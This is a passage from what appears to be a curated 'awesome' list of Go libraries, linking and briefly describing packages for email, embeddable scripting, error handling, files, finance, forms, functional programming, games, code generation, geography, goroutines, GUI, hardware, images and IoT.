- [go-premailer](https://github.com/vanng822/go-premailer) - Inline styling for HTML mail in Go.
- [go-simple-mail](https://github.com/xhit/go-simple-mail) - Very simple package to send emails with SMTP Keep Alive and two timeouts: Connect and Send.
- [Hectane](https://github.com/hectane/hectane) - Lightweight SMTP client providing an HTTP API.
- [hermes](https://github.com/matcornic/hermes) - Golang package that generates clean, responsive HTML e-mails.
- [mailchain](https://github.com/mailchain/mailchain) - Send encrypted emails to blockchain addresses written in Go.
- [mailgun-go](https://github.com/mailgun/mailgun-go) - Go library for sending mail with the Mailgun API.
- [MailHog](https://github.com/mailhog/MailHog) - Email and SMTP testing with web and API interface.
- [Mailpit](https://github.com/axllent/mailpit) - Email and SMTP testing tool for developers.
- [mailx](https://github.com/valord577/mailx) - Mailx is a library that makes it easier to send email via SMTP. It is an enhancement of the golang standard library `net/smtp`.
- [SendGrid](https://github.com/sendgrid/sendgrid-go) - SendGrid's Go library for sending email.
- [smtp](https://github.com/mailhog/smtp) - SMTP server protocol state machine.
- [smtpmock](https://github.com/mocktools/go-smtp-mock) - Lightweight configurable multithreaded fake SMTP server. Mimic any SMTP behaviour for your test environment.
- [truemail-go](https://github.com/truemail-rb/truemail-go) - Configurable Golang email validator/verifier. Verify email via Regex, DNS, SMTP and even more.
**[⬆ back to top](#contents)**
## Embeddable Scripting Languages
_Embedding other languages inside your go code._
- [anko](https://github.com/mattn/anko) - Scriptable interpreter written in Go.
- [binder](https://github.com/alexeyco/binder) - Go to Lua binding library, based on [gopher-lua](https://github.com/yuin/gopher-lua).
- [cel-go](https://github.com/google/cel-go) - Fast, portable, non-Turing complete expression evaluation with gradual typing.
- [ecal](https://github.com/krotik/ecal) - A simple embeddable scripting language which supports concurrent event processing.
- [expr](https://github.com/antonmedv/expr) - Expression evaluation engine for Go: fast, non-Turing complete, dynamic typing, static typing.
- [gentee](https://github.com/gentee/gentee) - Embeddable scripting programming language.
- [gisp](https://github.com/jcla1/gisp) - Simple LISP in Go.
- [go-duktape](https://github.com/olebedev/go-duktape) - Duktape JavaScript engine bindings for Go.
- [go-lua](https://github.com/Shopify/go-lua) - Port of the Lua 5.2 VM to pure Go.
- [go-php](https://github.com/deuill/go-php) - PHP bindings for Go.
- [go-python](https://github.com/sbinet/go-python) - naive go bindings to the CPython C-API.
- [goja](https://github.com/dop251/goja) - ECMAScript 5.1(+) implementation in Go.
- [golua](https://github.com/aarzilli/golua) - Go bindings for Lua C API.
- [gopher-lua](https://github.com/yuin/gopher-lua) - Lua 5.1 VM and compiler written in Go.
- [gval](https://github.com/PaesslerAG/gval) - A highly customizable expression language written in Go.
- [metacall](https://github.com/metacall/core) - Cross-platform Polyglot Runtime which supports NodeJS, JavaScript, TypeScript, Python, Ruby, C#, WebAssembly, Java, Cobol and more.
- [ngaro](https://github.com/db47h/ngaro) - Embeddable Ngaro VM implementation enabling scripting in Retro.
- [prolog](https://github.com/ichiban/prolog) - Embeddable Prolog.
- [purl](https://github.com/ian-kent/purl) - Perl 5.18.2 embedded in Go.
- [starlark-go](https://github.com/google/starlark-go) - Go implementation of Starlark: Python-like language with deterministic evaluation and hermetic execution.
- [tengo](https://github.com/d5/tengo) - Bytecode compiled script language for Go.
**[⬆ back to top](#contents)**
## Error Handling
_Libraries for handling errors._
- [emperror](https://github.com/emperror/emperror) - Error handling tools and best practices for Go libraries and applications.
- [eris](https://github.com/rotisserie/eris) - A better way to handle, trace, and log errors in Go. Compatible with the standard error library and github.com/pkg/errors.
- [errlog](https://github.com/snwfdhmp/errlog) - Hackable package that determines responsible source code for an error (and some other fast-debugging features). Pluggable to any logger in-place.
- [errors](https://github.com/emperror/errors) - Drop-in replacement for the standard library errors package and github.com/pkg/errors. Provides various error handling primitives.
- [errors](https://github.com/pkg/errors) - Package that provides simple error handling primitives.
- [errors](https://github.com/neuronlabs/errors) - Simple golang error handling with classification primitives.
- [errors](https://github.com/PumpkinSeed/errors) - The most simple error wrapper with awesome performance and minimal memory overhead.
- [errors](https://github.com/bnkamalesh/errors) - Drop-in replacement for builtin Go errors. This is a minimal error handling package with custom error types, user friendly messages, Unwrap & Is. With very easy to use and straightforward helper functions.
- [errors](https://github.com/cockroachdb/errors) - Go error library with error portability over the network.
- [errorx](https://github.com/joomcode/errorx) - A feature rich error package with stack traces, composition of errors and more.
- [exception](https://github.com/rbrahul/exception) - A simple utility package for exception handling with try-catch in Golang.
- [Falcon](https://github.com/SonicRoshan/falcon) - A Simple Yet Highly Powerful Package For Error Handling.
- [Fault](https://github.com/Southclaws/fault) - An ergonomic mechanism for wrapping errors in order to facilitate structured metadata and context for error values.
- [go-multierror](https://github.com/hashicorp/go-multierror) - Go (golang) package for representing a list of errors as a single error.
- [oops](https://github.com/samber/oops) - Error handling with context, stack trace and source fragments.
- [tracerr](https://github.com/ztrue/tracerr) - Golang errors with stack trace and source fragments.
**[⬆ back to top](#contents)**
## File Handling
_Libraries for handling files and file systems._
- [afero](https://github.com/spf13/afero) - FileSystem Abstraction System for Go.
- [afs](https://github.com/viant/afs) - Abstract File Storage (mem, scp, zip, tar, cloud: s3, gs) for Go.
- [baraka](https://github.com/xis/baraka) - A library to process http file uploads easily.
- [bigfile](https://github.com/bigfile/bigfile) - A file transfer system, support to manage files with http api, rpc call and ftp client.
- [checksum](https://github.com/codingsince1985/checksum) - Compute message digest, like MD5, SHA256, SHA1, CRC or BLAKE2s, for large files.
- [copy](https://github.com/otiai10/copy) - Copy directory recursively.
- [flop](https://github.com/homedepot/flop) - File operations library which aims to mirror feature parity with [GNU cp](https://www.gnu.org/software/coreutils/manual/html_node/cp-invocation.html).
- [gdu](https://github.com/dundee/gdu) - Disk usage analyzer with console interface.
- [go-csv-tag](https://github.com/artonge/go-csv-tag) - Load csv file using tag.
- [go-decent-copy](https://github.com/hugocarreira/go-decent-copy) - Copy files for humans.
- [go-exiftool](https://github.com/barasher/go-exiftool) - Go bindings for ExifTool, the well-known library used to extract as much metadata as possible (EXIF, IPTC, ...) from files (pictures, PDF, office, ...).
- [go-gtfs](https://github.com/artonge/go-gtfs) - Load gtfs files in go.
- [gofs](https://github.com/no-src/gofs) - A cross-platform real-time file synchronization tool out of the box.
- [gut/yos](https://github.com/1set/gut) - Simple and reliable package for file operations like copy/move/diff/list on files, directories and symbolic links.
- [higgs](https://github.com/dastoori/higgs) - A tiny cross-platform Go library to hide/unhide files and directories.
- [notify](https://github.com/rjeczalik/notify) - File system event notification library with simple API, similar to os/signal.
- [opc](https://github.com/qmuntal/opc) - Load Open Packaging Conventions (OPC) files for Go.
- [parquet](https://github.com/parsyl/parquet) - Read and write [parquet](https://parquet.apache.org) files.
- [pathtype](https://github.com/jonchun/pathtype) - Treat paths as their own type instead of using strings.
- [pdfcpu](https://github.com/pdfcpu/pdfcpu) - PDF processor.
- [skywalker](https://github.com/dixonwille/skywalker) - Package to allow one to concurrently go through a filesystem with ease.
- [stl](https://gitlab.com/russoj88/stl) - Modules to read and write STL (stereolithography) files. Concurrent algorithm for reading.
- [tarfs](https://github.com/posener/tarfs) - Implementation of the [`FileSystem` interface](https://godoc.org/github.com/kr/fs#FileSystem) for tar files.
- [todotxt](https://github.com/1set/todotxt) - Go library for Gina Trapani's [_todo.txt_](http://todotxt.org/) files, supports parsing and manipulating of task lists in the [_todo.txt_ format](https://github.com/todotxt/todo.txt).
- [vfs](https://github.com/C2FO/vfs) - A pluggable, extensible, and opinionated set of filesystem functionality for Go across a number of filesystem types such as os, S3, and GCS.
**[⬆ back to top](#contents)**
## Financial
_Packages for accounting and finance._
- [accounting](https://github.com/leekchan/accounting) - money and currency formatting for golang.
- [ach](https://github.com/moov-io/ach) - A reader, writer, and validator for Automated Clearing House (ACH) files.
- [bbgo](https://github.com/c9s/bbgo) - A crypto trading bot framework written in Go. Including common crypto exchange API, standard indicators, back-testing and many built-in strategies.
- [currency](https://github.com/bojanz/currency) - Handles currency amounts, provides currency information and formatting.
- [currency](https://github.com/bnkamalesh/currency) - High performant & accurate currency computation package.
- [decimal](https://github.com/shopspring/decimal) - Arbitrary-precision fixed-point decimal numbers.
- [fpdecimal](https://github.com/nikolaydubina/fpdecimal) - Fast and precise serialization and arithmetic for small fixed-point decimals
- [fpmoney](https://github.com/nikolaydubina/fpmoney) - Fast and simple ISO4217 fixed-point decimal money.
- [go-finance](https://github.com/alpeb/go-finance) - Library of financial functions for time value of money (annuities), cash flow, interest rate conversions, bonds and depreciation calculations.
- [go-finance](https://github.com/pieterclaerhout/go-finance) - Module to fetch exchange rates, check VAT numbers via VIES and check IBAN bank account numbers.
- [go-finnhub](https://github.com/m1/go-finnhub) - Client for stock market, forex and crypto data from finnhub.io. Access real-time financial market data from 60+ stock exchanges, 10 forex brokers, and 15+ crypto exchanges.
- [go-money](https://github.com/rhymond/go-money) - Implementation of Fowler's Money pattern.
- [ofxgo](https://github.com/aclindsa/ofxgo) - Query OFX servers and/or parse the responses (with example command-line client).
- [orderbook](https://github.com/i25959341/orderbook) - Matching Engine for Limit Order Book in Golang.
- [payme](https://github.com/jovandeginste/payme) - QR code generator (ASCII & PNG) for SEPA payments.
- [sleet](https://github.com/BoltApp/sleet) - One unified interface for multiple Payment Service Providers (PsP) to process online payment.
- [techan](https://github.com/sdcoffey/techan) - Technical analysis library with advanced market analysis and trading strategies.
- [ticker](https://github.com/achannarasappa/ticker) - Terminal stock watcher and stock position tracker.
- [transaction](https://github.com/claygod/transaction) - Embedded transactional database of accounts, running in multithreaded mode.
- [vat](https://github.com/dannyvankooten/vat) - VAT number validation & EU VAT rates.
**[⬆ back to top](#contents)**
## Forms
_Libraries for working with forms._
- [bind](https://github.com/robfig/bind) - Bind form data to any Go values.
- [binding](https://github.com/mholt/binding) - Binds form and JSON data from net/http Request to struct.
- [conform](https://github.com/leebenson/conform) - Keeps user input in check. Trims, sanitizes & scrubs data based on struct tags.
- [form](https://github.com/go-playground/form) - Decodes url.Values into Go value(s) and Encodes Go value(s) into url.Values. Dual Array and Full map support.
- [formam](https://github.com/monoculum/formam) - decode form's values into a struct.
- [forms](https://github.com/albrow/forms) - Framework-agnostic library for parsing and validating form/JSON data which supports multipart forms and files.
- [gbind](https://github.com/bdjimmy/gbind) - Bind data to any Go value. Can use built-in and custom expression binding capabilities; supports data validation
- [gorilla/csrf](https://github.com/gorilla/csrf) - CSRF protection for Go web applications & services.
- [httpin](https://github.com/ggicci/httpin) - Decode an HTTP request into a custom struct, including querystring, forms, HTTP headers, etc.
- [nosurf](https://github.com/justinas/nosurf) - CSRF protection middleware for Go.
- [qs](https://github.com/sonh/qs) - Go module for encoding structs into URL query parameters.
- [queryparam](https://github.com/tomwright/queryparam) - Decode `url.Values` into usable struct values of standard or custom types.
**[⬆ back to top](#contents)**
## Functional
_Packages to support functional programming in Go._
- [fp-go](https://github.com/repeale/fp-go) - Collection of Functional Programming helpers powered by Golang 1.18+ generics.
- [fpGo](https://github.com/TeaEntityLab/fpGo) - Monad, Functional Programming features for Golang.
- [fuego](https://github.com/seborama/fuego) - Functional Experiment in Go.
- [go-functional](https://github.com/BooleanCat/go-functional) - Functional programming in Go using generics
- [go-underscore](https://github.com/tobyhede/go-underscore) - Useful collection of helpfully functional Go collection utilities.
- [gofp](https://github.com/rbrahul/gofp) - A lodash like powerful utility library for Golang.
- [mo](https://github.com/samber/mo) - Monads and popular FP abstractions, based on Go 1.18+ Generics (Option, Result, Either...).
- [underscore](https://github.com/rjNemo/underscore) - Functional programming helpers for Go 1.18 and beyond.
- [valor](https://github.com/phelmkamp/valor) - Generic option and result types that optionally contain a value.
**[⬆ back to top](#contents)**
## Game Development
_Awesome game development libraries._
- [Azul3D](https://github.com/azul3d/engine) - 3D game engine written in Go.
- [Ebitengine](https://github.com/hajimehoshi/ebiten) - dead simple 2D game engine in Go.
- [engo](https://github.com/EngoEngine/engo) - Engo is an open-source 2D game engine written in Go. It follows the Entity-Component-System paradigm.
- [fantasyname](https://github.com/s0rg/fantasyname) - Fantasy names generator.
- [g3n](https://github.com/g3n/engine) - Go 3D Game Engine.
- [go-astar](https://github.com/beefsack/go-astar) - Go implementation of the A\* path finding algorithm.
- [go-sdl2](https://github.com/veandco/go-sdl2) - Go bindings for the [Simple DirectMedia Layer](https://www.libsdl.org/).
- [go3d](https://github.com/ungerik/go3d) - Performance oriented 2D/3D math package for Go.
- [gonet](https://github.com/xtaci/gonet) - Game server skeleton implemented with golang.
- [goworld](https://github.com/xiaonanln/goworld) - Scalable game server engine, featuring space-entity framework and hot-swapping.
- [Harfang3D](https://github.com/harfang3d/harfang3d) - 3D engine for the Go language, works on Windows and Linux ([Harfang on Go.dev](https://github.com/harfang3d/harfang-go)).
- [Leaf](https://github.com/name5566/leaf) - Lightweight game server framework.
- [nano](https://github.com/lonng/nano) - Lightweight, facility, high performance golang based game server framework.
- [Oak](https://github.com/oakmound/oak) - Pure Go game engine.
- [Pitaya](https://github.com/topfreegames/pitaya) - Scalable game server framework with clustering support and client libraries for iOS, Android, Unity and others through the C SDK.
- [Pixel](https://github.com/faiface/pixel) - Hand-crafted 2D game library in Go.
- [prototype](https://github.com/gonutz/prototype) - Cross-platform (Windows/Linux/Mac) library for creating desktop games using a minimal API.
- [raylib-go](https://github.com/gen2brain/raylib-go) - Go bindings for [raylib](https://www.raylib.com/), a simple and easy-to-use library to learn videogames programming.
- [termloop](https://github.com/JoelOtter/termloop) - Terminal-based game engine for Go, built on top of Termbox.
- [tile](https://github.com/kelindar/tile) - Data-oriented and cache-friendly 2D Grid library (TileMap), includes pathfinding, observers and import/export.
**[⬆ back to top](#contents)**
## Generators
_Tools that generate Go code._
- [convergen](https://github.com/reedom/convergen) - Feature rich type-to-type copy code generator.
- [copygen](https://github.com/switchupcb/copygen) - Generate type-to-type and type-based code without reflection.
- [generis](https://github.com/senselogic/GENERIS) - Code generation tool providing generics, free-form macros, conditional compilation and HTML templating.
- [go-enum](https://github.com/abice/go-enum) - Code generation for enums from code comments.
- [go-linq](https://github.com/ahmetalpbalkan/go-linq) - .NET LINQ-like query methods for Go.
- [goderive](https://github.com/awalterschulze/goderive) - Derives functions from input types.
- [gotype](https://github.com/wzshiming/gotype) - Golang source code parsing, usage like reflect package.
- [goverter](https://github.com/jmattheis/goverter) - Generate converters by defining an interface.
- [GoWrap](https://github.com/hexdigest/gowrap) - Generate decorators for Go interfaces using simple templates.
- [interfaces](https://github.com/rjeczalik/interfaces) - Command line tool for generating interface definitions.
- [jennifer](https://github.com/dave/jennifer) - Generate arbitrary Go code without templates.
- [typeregistry](https://github.com/xiaoxin01/typeregistry) - A library to create type dynamically.
**[⬆ back to top](#contents)**
## Geographic
_Geographic tools and servers_
- [geoserver](https://github.com/hishamkaram/geoserver) - geoserver Is a Go Package For Manipulating a GeoServer Instance via the GeoServer REST API.
- [gismanager](https://github.com/hishamkaram/gismanager) - Publish Your GIS Data(Vector Data) to PostGIS and Geoserver.
- [godal](https://github.com/airbusgeo/godal) - Go wrapper for GDAL.
- [H3](https://github.com/uber/h3-go) - Go bindings for H3, a hierarchical hexagonal geospatial indexing system.
- [H3 GeoJSON](https://github.com/mmadfox/go-geojson2h3) - Conversion utilities between H3 indexes and GeoJSON.
- [H3GeoDist](https://github.com/mmadfox/go-h3geo-dist) - Distribution of Uber H3geo cells by virtual nodes.
- [mbtileserver](https://github.com/consbio/mbtileserver) - A simple Go-based server for map tiles stored in mbtiles format.
- [osm](https://github.com/paulmach/osm) - Library for reading, writing and working with OpenStreetMap data and APIs.
- [pbf](https://github.com/maguro/pbf) - OpenStreetMap PBF golang encoder/decoder.
- [S2 geojson](https://github.com/pantrif/s2-geojson) - Convert geojson to s2 cells & demonstrating some S2 geometry features on map.
- [S2 geometry](https://github.com/golang/geo) - S2 geometry library in Go.
- [simplefeatures](https://github.com/peterstace/simplefeatures) - simplesfeatures is a 2D geometry library that provides Go types that model geometries, as well as algorithms that operate on them.
- [Tile38](https://github.com/tidwall/tile38) - Geolocation DB with spatial index and realtime geofencing.
- [Web-Mercator-Projection](https://github.com/jorelosorio/web-mercator-projection) A project to easily use and convert LonLat, Point and Tile to display info, markers, etc, in a map using the Web Mercator Projection.
- [WGS84](https://github.com/wroge/wgs84) - Library for Coordinate Conversion and Transformation (ETRS89, OSGB36, NAD83, RGF93, Web Mercator, UTM).
**[⬆ back to top](#contents)**
## Go Compilers
_Tools for compiling Go to other languages._
- [c2go](https://github.com/goplus/c2go) - Convert C code to Go code.
- [c4go](https://github.com/Konstantin8105/c4go) - Transpile C code to Go code.
- [esp32](https://github.com/andygeiss/esp32-transpiler) - Transpile Go into Arduino code.
- [f4go](https://github.com/Konstantin8105/f4go) - Transpile FORTRAN 77 code to Go code.
- [gopherjs](https://github.com/gopherjs/gopherjs) - Compiler from Go to JavaScript.
- [tardisgo](https://github.com/tardisgo/tardisgo) - Golang to Haxe to CPP/CSharp/Java/JavaScript transpiler.
**[⬆ back to top](#contents)**
## Goroutines
_Tools for managing and working with Goroutines._
- [ants](https://github.com/panjf2000/ants) - A high-performance and low-cost goroutine pool in Go.
- [artifex](https://github.com/borderstech/artifex) - Simple in-memory job queue for Golang using worker-based dispatching.
- [async](https://github.com/reugn/async) - An alternative sync library for Go (Future, Promise, Locks).
- [async](https://github.com/studiosol/async) - A safe way to execute functions asynchronously, recovering them in case of panic.
- [async-job](https://github.com/lab210-dev/async-job) - AsyncJob is an asynchronous queue job manager with light code, clear and speed.
- [breaker](https://github.com/kamilsk/breaker) - Flexible mechanism to make execution flow interruptible.
- [channelify](https://github.com/ddelizia/channelify) - Transform your function to return channels for easy and powerful parallel processing.
- [conc](https://github.com/sourcegraph/conc) - `conc` is your toolbelt for structured concurrency in go, making common tasks easier and safer.
- [concurrency-limiter](https://github.com/vivek-ng/concurrency-limiter) - Concurrency limiter with support for timeouts , dynamic priority and context cancellation of goroutines.
- [conexec](https://github.com/ITcathyh/conexec) - A concurrent toolkit to help execute funcs concurrently in an efficient and safe way. It supports specifying the overall timeout to avoid blocking and uses goroutine pool to improve efficiency.
- [cyclicbarrier](https://github.com/marusama/cyclicbarrier) - CyclicBarrier for golang.
- [execpool](https://github.com/hexdigest/execpool) - A pool built around exec.Cmd that spins up a given number of processes in advance and attaches stdin and stdout to them when needed. Very similar to FastCGI or Apache Prefork MPM but works for any command.
- [flowmatic](https://github.com/carlmjohnson/flowmatic) - Structured concurrency made easy.
- [go-actor](https://github.com/vladopajic/go-actor) - A tiny library for writing concurrent programs using actor model.
- [go-floc](https://github.com/workanator/go-floc) - Orchestrate goroutines with ease.
- [go-flow](https://github.com/kamildrazkiewicz/go-flow) - Control goroutines execution order.
- [go-tools/multithreading](https://github.com/nikhilsaraf/go-tools) - Manage a pool of goroutines using this lightweight library with a simple API.
- [go-trylock](https://github.com/subchen/go-trylock) - TryLock support on read-write lock for Golang.
- [go-waitgroup](https://github.com/pieterclaerhout/go-waitgroup) - Like `sync.WaitGroup` with error handling and concurrency control.
- [go-workerpool](https://github.com/zenthangplus/go-workerpool) - Inspired from Java Thread Pool, Go WorkerPool aims to control heavy Go Routines.
- [go-workers](https://github.com/catmullet/go-workers) - Easily and safely run workers for large data processing pipelines.
- [goccm](https://github.com/zenthangplus/goccm) - Go Concurrency Manager package limits the number of goroutines that allowed to run concurrently.
- [gohive](https://github.com/loveleshsharma/gohive) - A highly performant and easy to use Goroutine pool for Go.
- [gollback](https://github.com/vardius/gollback) - asynchronous simple function utilities, for managing execution of closures and callbacks.
- [gowl](https://github.com/hamed-yousefi/gowl) - Gowl is a process management and process monitoring tool at once. An infinite worker pool gives you the ability to control the pool and processes and monitor their status.
- [goworker](https://github.com/benmanns/goworker) - goworker is a Go-based background worker.
- [gowp](https://github.com/xxjwxc/gowp) - gowp is concurrency limiting goroutine pool.
- [gpool](https://github.com/Sherifabdlnaby/gpool) - manages a resizeable pool of context-aware goroutines to bound concurrency.
- [grpool](https://github.com/ivpusic/grpool) - Lightweight Goroutine pool.
- [hands](https://github.com/duanckham/hands) - A process controller used to control the execution and return strategies of multiple goroutines.
- [Hunch](https://github.com/AaronJan/Hunch) - Hunch provides functions like: `All`, `First`, `Retry`, `Waterfall` etc., that makes asynchronous flow control more intuitive.
- [kyoo](https://github.com/dirkaholic/kyoo) - Provides an unlimited job queue and concurrent worker pools.
- [neilotoole/errgroup](https://github.com/neilotoole/errgroup) - Drop-in alternative to `sync/errgroup`, limited to a pool of N worker goroutines.
- [nursery](https://github.com/arunsworld/nursery) - Structured concurrency in Go.
- [oversight](https://cirello.io/oversight) - Oversight is a complete implementation of the Erlang supervision trees.
- [parallel-fn](https://github.com/rafaeljesus/parallel-fn) - Run functions in parallel.
- [pond](https://github.com/alitto/pond) - Minimalistic and High-performance goroutine worker pool written in Go.
- [pool](https://github.com/go-playground/pool) - Limited consumer goroutine or unlimited goroutine pool for easier goroutine handling and cancellation.
- [queue](https://github.com/AnikHasibul/queue) - Gives you a `sync.WaitGroup` like queue group accessibility. Helps you to throttle and limit goroutines, wait for the end of the all goroutines and much more.
- [routine](https://github.com/timandy/routine) - `routine` is a `ThreadLocal` for go library. It encapsulates and provides some easy-to-use, non-competitive, high-performance `goroutine` context access interfaces, which can help you access coroutine context information more gracefully.
- [routine](https://github.com/x-mod/routine) - go routine control with context, support: Main, Go, Pool and some useful Executors.
- [semaphore](https://github.com/kamilsk/semaphore) - Semaphore pattern implementation with timeout of lock/unlock operations based on channel and context.
- [semaphore](https://github.com/marusama/semaphore) - Fast resizable semaphore implementation based on CAS (faster than channel-based semaphore implementations).
- [stl](https://github.com/ssgreg/stl) - Software transactional locks based on Software Transactional Memory (STM) concurrency control mechanism.
- [threadpool](https://github.com/shettyh/threadpool) - Golang threadpool implementation.
- [tunny](https://github.com/Jeffail/tunny) - Goroutine pool for golang.
- [worker-pool](https://github.com/vardius/worker-pool) - goworker is a Go simple async worker pool.
- [workerpool](https://github.com/gammazero/workerpool) - Goroutine pool that limits the concurrency of task execution, not the number of tasks queued.
**[⬆ back to top](#contents)**
## GUI
_Libraries for building GUI Applications._
_Toolkits_
- [app](https://github.com/murlokswarm/app) - Package to create apps with GO, HTML and CSS. Supports: MacOS, Windows in progress.
- [fyne](https://github.com/fyne-io/fyne) - Cross platform native GUIs designed for Go based on Material Design. Supports: Linux, macOS, Windows, BSD, iOS and Android.
- [gio](https://gioui.org) - Gio is a library for writing cross-platform immediate mode GUI-s in Go. Gio supports all the major platforms: Linux, macOS, Windows, Android, iOS, FreeBSD, OpenBSD and WebAssembly.
- [go-astilectron](https://github.com/asticode/go-astilectron) - Build cross platform GUI apps with GO and HTML/JS/CSS (powered by Electron).
- [go-gtk](https://mattn.github.io/go-gtk/) - Go bindings for GTK.
- [go-sciter](https://github.com/sciter-sdk/go-sciter) - Go bindings for Sciter: the Embeddable HTML/CSS/script engine for modern desktop UI development. Cross platform.
- [goradd/html5tag](https://github.com/goradd/html5tag) - Library for outputting HTML5 tags.
- [gotk3](https://github.com/gotk3/gotk3) - Go bindings for GTK3.
- [gowd](https://github.com/dtylman/gowd) - Rapid and simple desktop UI development with GO, HTML, CSS and NW.js. Cross platform.
- [qt](https://github.com/therecipe/qt) - Qt binding for Go (support for Windows / macOS / Linux / Android / iOS / Sailfish OS / Raspberry Pi).
- [ui](https://github.com/andlabs/ui) - Platform-native GUI library for Go. Cross platform.
- [Wails](https://wails.io) - Mac, Windows, Linux desktop apps with HTML UI using built-in OS HTML renderer.
- [walk](https://github.com/lxn/walk) - Windows application library kit for Go.
- [webview](https://github.com/zserge/webview) - Cross-platform webview window with simple two-way JavaScript bindings (Windows / macOS / Linux).
_Interaction_
- [AppIndicator Go](https://github.com/gopherlibs/appindicator) - Go bindings for libappindicator3 C library.
- [gosx-notifier](https://github.com/deckarep/gosx-notifier) - OSX Desktop Notifications library for Go.
- [mac-activity-tracker](https://github.com/prashantgupta24/activity-tracker) - OSX library to notify about any (pluggable) activity on your machine.
- [mac-sleep-notifier](https://github.com/prashantgupta24/mac-sleep-notifier) - OSX Sleep/Wake notifications in golang.
- [robotgo](https://github.com/go-vgo/robotgo) - Go Native cross-platform GUI system automation. Control the mouse, keyboard and other.
- [systray](https://github.com/getlantern/systray) - Cross platform Go library to place an icon and menu in the notification area.
- [trayhost](https://github.com/shurcooL/trayhost) - Cross-platform Go library to place an icon in the host operating system's taskbar.
- [zenity](https://github.com/ncruces/zenity) - Cross-platform Go library and CLI to create simple dialogs that interact graphically with the user.
**[⬆ back to top](#contents)**
## Hardware
_Libraries, tools, and tutorials for interacting with hardware._
- [arduino-cli](https://github.com/arduino/arduino-cli) - Official Arduino CLI and library. Can run standalone, or be incorporated into larger Go projects.
- [emgo](https://github.com/ziutek/emgo) - Go-like language for programming embedded systems (e.g. STM32 MCU).
- [ghw](https://github.com/jaypipes/ghw) - Golang hardware discovery/inspection library.
- [go-osc](https://github.com/hypebeast/go-osc) - Open Sound Control (OSC) bindings for Go.
- [go-rpio](https://github.com/stianeikeland/go-rpio) - GPIO for Go, doesn't require cgo.
- [goroslib](https://github.com/aler9/goroslib) - Robot Operating System (ROS) library for Go.
- [joystick](https://github.com/0xcafed00d/joystick) - a polled API to read the state of an attached joystick.
- [sysinfo](https://github.com/zcalusic/sysinfo) - A pure Go library providing Linux OS / kernel / hardware system information.
**[⬆ back to top](#contents)**
## Images
_Libraries for manipulating images._
- [bild](https://github.com/anthonynsimon/bild) - Collection of image processing algorithms in pure Go.
- [bimg](https://github.com/h2non/bimg) - Small package for fast and efficient image processing using libvips.
- [cameron](https://github.com/aofei/cameron) - An avatar generator for Go.
- [canvas](https://github.com/tdewolff/canvas) - Vector graphics to PDF, SVG or rasterized image.
- [color-extractor](https://github.com/marekm4/color-extractor) - Dominant color extractor with no external dependencies.
- [darkroom](https://github.com/gojek/darkroom) - An image proxy with changeable storage backends and image processing engines with focus on speed and resiliency.
- [draft](https://github.com/lucasepe/draft) - Generate High Level Microservice Architecture diagrams for GraphViz using simple YAML syntax.
- [geopattern](https://github.com/pravj/geopattern) - Create beautiful generative image patterns from a string.
- [gg](https://github.com/fogleman/gg) - 2D rendering in pure Go.
- [gift](https://github.com/disintegration/gift) - Package of image processing filters.
- [gltf](https://github.com/qmuntal/gltf) - Efficient and robust glTF 2.0 reader, writer and validator.
- [go-cairo](https://github.com/ungerik/go-cairo) - Go binding for the cairo graphics library.
- [go-gd](https://github.com/bolknote/go-gd) - Go binding for GD library.
- [go-nude](https://github.com/koyachi/go-nude) - Nudity detection with Go.
- [go-webcolors](https://github.com/jyotiska/go-webcolors) - Port of webcolors library from Python to Go.
- [go-webp](https://github.com/kolesa-team/go-webp) - Library for encode and decode webp pictures, using libwebp.
- [gocv](https://github.com/hybridgroup/gocv) - Go package for computer vision using OpenCV 3.3+.
- [goimagehash](https://github.com/corona10/goimagehash) - Go Perceptual image hashing package.
- [goimghdr](https://github.com/corona10/goimghdr) - The imghdr module determines the type of image contained in a file for Go.
- [govatar](https://github.com/o1egl/govatar) - Library and CMD tool for generating funny avatars.
- [govips](https://github.com/davidbyttow/govips) - A lightning fast image processing and resizing library for Go.
- [gowitness](https://github.com/sensepost/gowitness) - Screenshoting webpages using go and headless chrome on command line.
- [gridder](https://github.com/shomali11/gridder) - A Grid based 2D Graphics library.
- [image2ascii](https://github.com/qeesung/image2ascii) - Convert image to ASCII.
- [imagick](https://github.com/gographics/imagick) - Go binding to ImageMagick's MagickWand C API.
- [imaginary](https://github.com/h2non/imaginary) - Fast and simple HTTP microservice for image resizing.
- [imaging](https://github.com/disintegration/imaging) - Simple Go image processing package.
- [img](https://github.com/hawx/img) - Selection of image manipulation tools.
- [ln](https://github.com/fogleman/ln) - 3D line art rendering in Go.
- [mergi](https://github.com/noelyahan/mergi) - Tool & Go library for image manipulation (Merge, Crop, Resize, Watermark, Animate).
- [mort](https://github.com/aldor007/mort) - Storage and image processing server written in Go.
- [mpo](https://github.com/donatj/mpo) - Decoder and conversion tool for MPO 3D Photos.
- [picfit](https://github.com/thoas/picfit) - An image resizing server written in Go.
- [pt](https://github.com/fogleman/pt) - Path tracing engine written in Go.
- [resize](https://github.com/nfnt/resize) - Image resizing for Go with common interpolation methods.
- [rez](https://github.com/bamiaux/rez) - Image resizing in pure Go and SIMD.
- [scout](https://github.com/jonoton/scout) - Scout is a standalone open source software solution for DIY video security.
- [smartcrop](https://github.com/muesli/smartcrop) - Finds good crops for arbitrary images and crop sizes.
- [steganography](https://github.com/auyer/steganography) - Pure Go Library for LSB steganography.
- [stegify](https://github.com/DimitarPetrov/stegify) - Go tool for LSB steganography, capable of hiding any file within an image.
- [svgo](https://github.com/ajstarks/svgo) - Go Language Library for SVG generation.
- [tga](https://github.com/ftrvxmtrx/tga) - Package tga is a TARGA image format decoder/encoder.
- [webp-server](https://github.com/mehdipourfar/webp-server) - Simple and minimal image server capable of storing, resizing, converting and caching images.
**[⬆ back to top](#contents)**
## IoT (Internet of Things)
_Libraries for programming devices of the IoT._
- [connectordb](https://github.com/connectordb/connectordb) - Open-Source Platform for Quantified Self & IoT.
- [devices](https://github.com/goiot/devices) - Suite of libraries for IoT devices, experimental for x/exp/io.
- [ekuiper](https://github.com/lf-edge/ekuiper) - Lightweight data stream processing engine for IoT edge.
- [eywa](https://github.com/xcodersun/eywa) - Project Eywa is essentially a connection manager that keeps track of connected devices.
- [flogo](https://github.com/tibcosoftware/flogo) - Project Flogo is an Open Source Framework for IoT Edge Apps & Integration.
- [gatt](https://github.com/paypal/gatt) - Gatt is a Go package for building Bluetooth Low Energy peripherals.
- [gobot](https://github.com/hybridgroup/gobot/) - Gobot is a framework for robotics, physical computing, and the Internet of Things.
- [huego](https://github.com/amimof/huego) - An extensive Philips Hue client library for Go.
- [iot](https://github.com/vaelen/iot/) - IoT is a simple framework for implementing a Google IoT Core device.
